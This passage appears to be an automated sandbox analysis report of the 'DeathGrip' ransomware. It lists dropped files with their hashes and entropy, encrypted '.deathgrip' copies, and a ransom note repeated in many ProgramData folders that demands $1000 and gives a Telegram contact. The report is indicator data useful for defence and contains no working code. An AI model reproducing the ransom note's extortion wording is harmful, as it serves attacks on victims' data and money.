                                                          SHA-512:56439386C9BA73D588A0C9AA9ADE206D91A61137F1868E8A659662DC5147C8D551D0F8DC11F4DC7B0477F3F93DC6A676279EF640CD99723590ECA77216C81E5A
                                                          Malicious:false
                                                          Preview:...N.....................................;...{..:....|.......|...............|)......|.."o.......|..................".9c.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Network\Downloader\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\SmsRouter\MessageStore\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\Storage Health\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\UEV\InboxTemplates\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\UEV\Templates\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\User Account Pictures\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\Windows\Caches\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\Windows\ClipSVC\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\Windows\Start Menu\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\ProgramData\Microsoft\Windows\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):448
                                                          Entropy (8bit):6.557907893568431
                                                          Encrypted:false
                                                          SSDEEP:12:KX0UAGBWcDxn9SB9dN9Ph3gv/qYByvyBYATE37HHSoy3LtkYY:KXDbWcDxn9SB9dN9EqY0nAQDyBW1
                                                          MD5:3A97499816D7E8BF689EF2B1F74AA58F
                                                          SHA1:6DA21113B771912FDA8F0BBF8253F603757DF75C
                                                          SHA-256:1F12166BCC58E3AE694D179F8889C3C47202F01454709F378219D2C8ED388C3A
                                                          SHA-512:00C2EDB5CAD38DDA9E970A09ED70550637094124CD838E89F57BA67FBC6325D72DFD4E230C76F5562167F9C3E44C041EBEDB57E05476FDC435C7AA5520499053
                                                          Malicious:false
                                                          Preview:........u.'X...qs..4zB...-..4H...[.U.3.B ...2...+lB9{.;..e.m.Z.9...K....c....1o.;.>[........"..qN25uZnEGd5/bvLcGAjdTEhW47+NZP9k6e1RejkK3hBpS65cumIZ7mxSISSdwBxeScaL1flPbYv7O1NrnWLyXhGa6n3RLgcyavnlvTn6EhXU3eIyUVQpkgNCrONeoComotdm8pzTGOIaPLqC7/xgmwZ+5GUVF+xMj3M31fBsIIzUPK6T1Z+Uwr8eoXz4Ij+SEY+f3cdcJFSX33YYej1nvb/dKn9OcBVFgLi8nq/DDdzehNDSw3nbVlfcplAEYV/a7CuK7HV3G1hy310BdBqk7aDYi4CvGqWeLCxyB27bqfr3iDGw10kjRJ3vknvJZJVhBsGrNybfqFfnuGRioyNDsA==

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64304
                                                          Entropy (8bit):7.9969939993500345
                                                          Encrypted:true
                                                          SSDEEP:1536:X3L7aJOxYSZFitRg1gzjQwXTiDKcw5XRZ8sz:Xb9qOFity1kQcQKlNPN
                                                          MD5:F1807C674345DFD2505DDD21D8A6FB36
                                                          SHA1:88BCC5492C416A140B0D74A4B0F1F888DB56EBFB
                                                          SHA-256:EF8A8F5ED5936E6AE068CF7C06475C6E14CF0AE7183E38D808D11705362FE210
                                                          SHA-512:0CE56E339734F7447CCB79D0E4BE546B4D111825783EF8C293CA05686DB13F679A81CDFBCC59B77DB81B2CBA1DA12835913B80BB9A215D066156577B39B69B66
                                                          Malicious:true
                                                          Preview:...........,.......?Dq-.Q,A....0...S..#.N.:hb..........g..Z4..=nd|H1....v.....>.K..q..Q.....GuX-..P..x....>.h>q.2...JM...g.v..u^.gn........[]...C%$...&..9j.....HOV. OT.5G.....C-b.#.......Ya....^....RP..Z.{.........7..qZ..N.5..*i.\j....tW.....*L..NS.h.....d..q./."A...n..4..0.^]4.[.........s..gOQ.{..f."t.AY...B.s.f......f..D.6o....o ..9.....A......U`....T..9...c..s.)Y....3S2 G..:..\.Ef..8.........\.}.Z..+..3q:.Cc..ev....L~I...Pu........&;c'y...g%.......... .....1.wl~.Y.\..jtl...U.[$.%..-+.x.~.X.!.i.u....Ov.D8E......8.P.64.....-i.`......0..@..."P......%.M...+c.F2a....+G+X|.........f._Z.8....e../.....c.2...=%F3.'.Y.j.....z.S[vm9.\.1...d.n~..n..(...@;.i.lD('...7..8bP.[.b.^.%.9:..a...k..%.L...P........3..7.p......_..`{bO.2.....G...T.....Z.#...i......U....^.7.....CYF..N".\..).u..@.@...0..R....$.Z...wXLR;5.(.._RX.wLm..[...+m.0..s..j:.~n`."...1..Q].,6..v.'...r5Z..z.a5....Gos.]Z........v........lq,..la..H.#..'.[...+.....|.A.P...4`.+f;.....

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\UsrClass.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\UsrClass.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.976235942469954
                                                          Encrypted:false
                                                          SSDEEP:192:2NUv5zmEX3zBIOZMKQDzcXpaNOG+HyoT2jZRcD:2Sv9/X3KOScXsNX+dT6Lq
                                                          MD5:AC5A29BE6AAB5B10A01A4B292CB9FC9F
                                                          SHA1:AAC8883B938229E6927501E3055DAA32976DE327
                                                          SHA-256:E8EBE69806A7C79AC86CD5DDC309AAA92758A4C3DAF1A84302C5CEDBE0897633
                                                          SHA-512:7C2C31DB7B16EB4290C0C84EDCEABFEB7F87DCFBEF539C2E25ECBC62513D1E313818F8F01EE29B6B7403869F58F4A7555C42C08DD839BDEAAE5033BCA5C0F16F
                                                          Malicious:false
                                                          Preview:.........E.@n[..A..F.. DT...~p....O&w.Is.."G.I.....|.f..;j#.UT.../9.......K"Ko.2..N....w..e.H.....f.G.b0..|...$.5...xC./'...rA.WN....D.....r...A..i}.}RJ...wq4j.SM..H..z..Q.=.!.....rT.z..(.S.%..j.....{..)...l......}.i.hK...t....)..}..X4.i...VDbuQ..QO.F.l.`.5.*[...R.W..;...[.V....(..*E.w.D...M0....@.a...7....^X\..............3..N.1....].....,'[.v[.5.C..Q:..O..o....;.;......{.R.h.i..'.~.S..YP.9....+.L...h....,P.Nh.%...Y.=,.....g<.A.))>.....6.L...l..;n.OE.;.....I.....m.t#.L..#.x.....e.F...K>v..7.T.[.d...ih\.)...S..iS.>~...%.[.iw..n..t.G.[O..9.].|.QQW.Y....O.7.0FUC.%.(.......H.....~..o..[.......VV.....=.....x.}..7......k.Z....zQ...M.....?....A<..Y.1....'.....n..S..b.Z....@...nVY.m*Q..........k;.....9@X..].......3...O.T.C.......A.....H..nz..y...b!'.q..f.w.....)`...1..w... .:..>[]fL......m[.....@c....o]....1.....*...q.c.7.e..{B.:..7k........#g.e|h..z{A.9{..)....,...c.@w..9.e?0.....i.W..K..5...(....i...%B..x. ......2......{..1

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1472
                                                          Entropy (8bit):7.772872330121152
                                                          Encrypted:false
                                                          SSDEEP:24:qCLA5zzW6N5MFg533Qnw9XJtW2aEBuS9kTYHfi8gv//CYmt4h7:qC0tyQQw9XJtWsBuS9kTQi8S3CYmt4h7
                                                          MD5:EA2D2A3A6AC12AC7874180ECA6A365B0
                                                          SHA1:F8D8E0E1F1648F6F8A0E6B3651457A8961E3B10E
                                                          SHA-256:49D1EAD1E49E9F93E238E6CCC384DEB4A92494DD6B480033BF6F78D691B6892E
                                                          SHA-512:407CAEF3B237315DC91AF1E351DA13B1F88FD8EB97A9C680F74C9ACB89F56DC09C804C81F208C0FA1730B476C194D02F03356101A4BA5CDE69FB288672B128D8
                                                          Malicious:false
                                                          Preview:........K.._2.NU>$..Z....s.....).&.....>..<*(....4.....mO..J\j...L.qM..)..w......8.C...P.G.W..5.*.O.L*.b..4p.nt...Y<..........s;..b..W.........:..6.....?.BJ M2..d.5......#g..k.!W.?x..;.Ut...o....|.2xg\.W.*.......A.n...s..Fw../..>Wz.~u%.........K`.d..:R.-7.#.7{[.S......w...v.A.....s.|.;D.N8.....%..(.6T.!.....$&..|{....O....|WQi..-..v_.G.2O^]n.../....Z&07uYd<z....[.~...O..U!.T..g...f..1.L7JT.....q...Sc..|+!.c........l.n.....M...X....].%R..jD.V.1....+..@..-...x.7..z.-P...B.2J.N......J ....D?..\`...I.U.6.....GE..r?s..Ou.m.W....X.>|.`.WT.\W.8L...F...Q..L^uY.X....4"..`....!.e...0.M^.@..k.o.jd..+.Dzny"....y....ea....H..."H}.P2.v..U....c...&#.j...D.2.........}.......I.<.....X..0T....K....A3...bx.x.O..'s..#.]I.......:...08&n.V.*[K.$AT.32..\[..0w.=x......K.ggbn...&..c.Ew..];._+.O....N....V:0..P...3~.}..QV.H...[*WM.....T... ..x._..L6.?.uz...i.kO...C.=....A..P@.ng;......q..k.......>.......6.....g...E..v.............{O\l...}.3....RIA......{!B

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1472
                                                          Entropy (8bit):7.759026428503303
                                                          Encrypted:false
                                                          SSDEEP:24:VWpERRG17AJHFEjsGEHekwAlOJBYy7+9Sw8+sb0boPfHSzQLtxPkSWoiwslfIW1L:VSE2KHFzNHeduOJ2yq0w8+sb0bA/cQ3c
                                                          MD5:649124421ECB23FA183F23756C9F139E
                                                          SHA1:50D5307628D0A80EF3DB2501A5161ED109D96AE4
                                                          SHA-256:1747DCF69D070DC28D69F8209A4D2E62E304F4552C32698436545C9DA1400B24
                                                          SHA-512:CBA565223C9B375A842569EE2670BA9628A36EAF7E9F0DF37B847D25D0E98730750A4878CA6EE2EDA38219D928A5B69C5AC0057C5314FBBC80978E3321E96E50
                                                          Malicious:false
